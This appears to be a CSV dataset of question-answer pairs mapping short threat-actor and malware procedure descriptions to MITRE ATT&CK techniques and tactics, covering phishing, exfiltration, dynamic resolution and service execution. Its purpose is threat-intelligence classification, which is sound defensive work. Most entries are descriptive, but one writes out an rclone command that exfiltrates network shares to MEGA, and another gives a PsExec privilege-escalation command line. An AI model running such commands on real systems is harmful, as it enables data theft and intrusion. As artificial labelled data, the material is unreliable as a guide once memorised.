+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group sent victims spearphishing messages via LinkedIn concerning fictitious jobs.","Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used the legitimate mailing service Constant Contact to send phishing e-mails.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ajax Security Team has used various social media channels to spearphish victims.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CURIUM has used social media to deliver malicious files to victims.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dark Caracal spearphished victims via Facebook and Whatsapp.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EXOTIC LILY has used the e-mail notification features of legitimate file sharing services for spearphishing.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.","Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used LinkedIn to send spearphishing links.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has sent loaders configured to run Ninja as zip archives via Telegram.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windshift has used fake personas on social media to engage and target victims.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja has been distributed to victims via the messaging app Telegram.,"Tecnique: T1566.003 Phishing: Spearphishing via Service, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0027, Scattered Spider impersonated legitimate IT personnel in phone calls to direct victims to download a remote monitoring and management (RMM) tool that would allow the adversary to remotely control their system.","Tecnique: T1566.004 Phishing: Spearphishing Voice, Tactic: TA0001 Initial Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0017, APT41 used Cloudflare services for data exfiltration.","Tecnique: T1567 Exfiltration Over Web Service, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 can exfiltrate data over Google Drive.,"Tecnique: T1567 Exfiltration Over Web Service, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used the Telegram API `sendMessage` to relay data on compromised devices.,"Tecnique: T1567 Exfiltration Over Web Service, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has exfiltrated files using web services.,"Tecnique: T1567 Exfiltration Over Web Service, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DropBook has used legitimate web services to exfiltrate data.,"Tecnique: T1567 Exfiltration Over Web Service, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ngrok has been used by threat actors to configure servers for data exfiltration.,"Tecnique: T1567 Exfiltration Over Web Service, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use GitHub for data exfiltration.,"Tecnique: T1567.001 Exfiltration Over Web Service: Exfiltration to Code Repository, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y ""\\SERVER\Shares"" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.","Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.","Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira will exfiltrate victim data using applications such as Rclone.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has exfiltrated stolen data to OneDrive accounts.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.","Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has exfiltrated victim data to cloud storage service accounts.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 has exfiltrated stolen data to the MEGA file sharing site.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has exfiltrated data to file sharing sites, including MEGA.","Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used cloud services, including OneDrive, for data exfiltration.","Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has exfiltrated data to Google Drive.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider has exfiltrated victim data to the MEGA file sharing site.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has exfiltrated stolen data to Dropbox.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used a DropBox uploader to exfiltrate stolen files.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used WebDAV to upload stolen USB files to a cloud drive. Turla has also exfiltrated stolen files to OneDrive and 4shared.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has exfiltrated stolen victim data to various cloud storage providers.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIRCONIUM has exfiltrated stolen data to Dropbox.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoomBox can upload data to dedicated per-victim folders in Dropbox.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can send files from a victim's machine to Dropbox.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CreepyDrive can use cloud services including OneDrive for data exfiltration.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crutch has exfiltrated stolen data to Dropbox.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use Dropbox for data exfiltration.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus has exfiltrated data to file sharing sites.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pcexter can upload stolen files to OneDrive storage accounts via HTTP `POST`.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can send collected data to cloud storage services such as PCloud.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use a file exfiltration tool to upload specific files to Dropbox.,"Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.","Tecnique: T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage, Tactic: TA0010 Exfiltration"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0026, the threat actors re-registered a ClouDNS dynamic DNS subdomain which was previously used by ANDROMEDA.","Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Night Dragon, threat actors used dynamic DNS services for C2.","Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Dust Storm, the threat actors used dynamic DNS domains from a variety of free providers, including No-IP, Oray, and 3322.","Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors used dynamic DNS services, including Duck DNS and DNS Exit, as part of their C2 infrastructure.","Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used dynamic DNS resolution to construct and resolve to randomly-generated subdomains for C2.","Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used Dynamic DNS providers for their malware C2 infrastructure.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BITTER has used DDNS for C2 communications.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has incorporated dynamic DNS domains in its infrastructure.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used dynamic DNS services for C2 infrastructure.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Transparent Tribe has used dynamic DNS services to set up C2.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can be configured to use dynamic DNS.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has used a dynamic DNS service for C2.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can use dynamic DNS domain names in C2.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has forged POST strings with a random choice from a list of possibilities including ""forum"", ""php"", ""view"", etc. while making connection with the C2, hindering detection efforts.","Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETEAGLE can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM has resolved Pony C2 server IP addresses by either converting Bitcoin blockchain transaction data to specific octets, or accessing IP addresses directly within the Namecoin blockchain.","Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUNBURST dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.,"Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tomiris has connected to a signalization server that provides a URL and port, and then Tomiris sends a GET request to that URL to establish C2.","Tecnique: T1568 Dynamic Resolution, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used fast flux to mask botnets by distributing payloads across multiple IPs.,"Tecnique: T1568.001 Dynamic Resolution: Fast Flux DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used dynamic DNS service providers to host malicious domains.,"Tecnique: T1568.001 Dynamic Resolution: Fast Flux DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Amadey has used fast flux DNS for its C2.,"Tecnique: T1568.001 Dynamic Resolution: Fast Flux DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.,"Tecnique: T1568.001 Dynamic Resolution: Fast Flux DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT has used a fast flux DNS for C2 IP resolution.,"Tecnique: T1568.001 Dynamic Resolution: Fast Flux DNS, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 has used DGAs to change their C2 servers monthly.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA551 has used a DGA to generate URLs from executed macros.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aria-body has the ability to use a DGA for C2 communications.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth has used a DGA in C2 communications.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BONDUPDATER uses a DGA to communicate with command and control servers.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can implement DGA using the current date as a seed variable.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CCBkdr can use a DGA for Fallback Channels if communications with the primary command and control server are lost.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK can use a DGA for Fallback Channels, domains are generated by concatenating words from lists.","Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker has used a DGA that seeds with the current UTC victim system date to generate domains.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman has used a DGA to generate a domain name for C2.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Doki has used the DynDNS service and a DGA based on the Dogecoin blockchain to generate C2 domains.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ebury has used a DGA to generate a domain name for C2.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.","Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can use hardcoded domains as an input for domain generation algorithms.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MiniDuke can use DGA to generate new Twitter URLs for C2.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POSHSPY uses a DGA to derive command and control URLs from a word list.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use domain generation algorithms in C2 communication.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShadowPad uses a DGA that is based on the day of the month for C2 servers.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark can send DNS C2 communications using a unique domain generation algorithm.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SombRAT can use a custom DGA to generate a subdomain for C2.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used a DGA to generate domain names for C2.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ngrok can provide DGA for C2 servers through the use of random URL strings that change every 12 hours.,"Tecnique: T1568.002 Dynamic Resolution: Domain Generation Algorithms, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT12 has used multiple variants of DNS Calculation including multiplying the first two octets of an IP address and adding the third octet to that value in order to get a resulting command and control port.,"Tecnique: T1568.003 Dynamic Resolution: DNS Calculation, Tactic: TA0011 Command and Control"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has created system services to execute cryptocurrency mining software.,"Tecnique: T1569 System Services, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus has loaded a plist file using the launchctl command.,"Tecnique: T1569.001 System Services: Launchctl, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto uses launchctl to enable screen sharing on the victim’s machine.,"Tecnique: T1569.001 System Services: Launchctl, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner launched the QEMU services in the /Library/LaunchDaemons/ folder using launchctl. It also uses launchctl to unload all Launch Daemons when updating to a newer version of LoudMiner.,"Tecnique: T1569.001 System Services: Launchctl, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET loads a system level launchdaemon using the launchctl load -w command from /System/Librarby/LaunchDaemons/ssh.plist.,"Tecnique: T1569.001 System Services: Launchctl, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner has used `launchctl` to restart the Launch Agent.,"Tecnique: T1569.001 System Services: Launchctl, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, threat actors ran sc start to start the COMSysApp as part of the service hijacking and sc stop to stop and reconfigure the COMSysApp.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors created services on remote systems for execution purposes.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32's backdoor has used Windows services as a way to execute its malicious payload.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has created new services or modified existing ones to run executables, commands, or scripts.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used post-exploitation tools including RemCom and the Non-sucking Service Manager (NSSM) to execute processes.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON loader.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has executed custom-compiled XMRIG miner DLLs by configuring them to execute via the ""wercplsupport"" service.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used PsExec to deploy beacons on compromised systems.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has created Windows services to execute encoded PowerShell commands.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used a tool known as RemoteExec (similar to PsExec) to remotely execute batch scripts and binaries.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used Winexe to install a service on the remote system.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used `services.exe` to execute scripts and executables during lateral movement within a victim's network. Wizard Spider has also used batch scripts that leverage PsExec to execute a previously transferred ransomware payload on a victim's network.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can create and execute services to load its payload.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's dispatcher can be executed as a service.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT can start, stop, or delete services.","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bad Rabbit drops a file named infpub.datinto the Windows directory and is executed through SCManager and rundll.exe.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Brute Ratel C4 can create Windows system services for execution.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can create and start services on a compromised host.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate tries to elevate privileges to SYSTEM using PsExec to locally execute as a service, such as cmd /c c:\temp\PsExec.exe -accepteula -j -d -s [Target Binary].","Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can use PsExec to execute a payload on a remote host.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has used svchost.exe to execute a malicious DLL .,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can create system services to aid in executing the payload.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWizard can use `OpenRemoteServiceManager` to create a service.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq uses svchost.exe to execute a malicious DLL included in a new service group.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro has the ability to start and stop a specified service.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Impacket contains various modules emulating other service execution tools such as PsExec.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has used Windows services as a way to execute its malicious payload.,"Tecnique: T1569.002 System Services: Service Execution, Tactic: TA0002 Execution"
